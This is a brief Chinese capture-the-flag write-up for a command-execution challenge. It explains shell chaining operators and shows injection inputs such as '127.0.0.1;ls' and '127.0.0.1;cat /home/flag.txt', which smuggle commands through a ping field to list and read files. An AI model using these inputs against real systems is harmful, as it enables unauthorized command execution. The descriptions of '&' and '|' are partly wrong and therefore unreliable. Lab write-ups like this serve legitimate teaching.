提示:本人24小时在线,如有疑问,可联系我!
前言
攻防世界command_execution
一、题目?
进去看看
二、解决办法
1.先试试ping一下
http://www.baidu.com
2.命令执行漏洞
掌握有关命令执行的知识
windows 或 linux 下:
command1 && command2 先执行 command1,如果为真,再执行 command2
command1 | command2 只执行 command2
command1 & command2 先执行 command2 后执行 command1
command1 || command2 先执行 command1,如果为假,再执行 command2
命令执行漏洞(| || & && 称为 管道符)
输入127.0.0.1,没有有用的信息
这里我们选择& 、;、 &&作为注入的方式应该都可以。
测试
先ls一下
127.0.0.1;ls
#或者
127.0.0.1&&ls
#或者
127.0.0.1&ls
![在这里插入图片描述](https://img-blog.csdnimg.cn/8ba6dea1f9524e3199fa2c037a5debdd.png
选择方式查找flag文件
一种方法是通过逐层查看文件目录找到,另一种方式是通过查找函数
函数有全局查找函数 find
127.0.0.1;find / -name "flag*"
找到文件路径,然后cat一下就好了
127.0.0.1;cat /home/flag.txt
总结
提示:涉及的知识点是命令执行漏洞。
记住两个命令
全局查找函数 find
127.0.0.1;find / -name "flag*"
找到文件路径,然后cat一下就好了
127.0.0.1;cat /home/flag.txt
结束。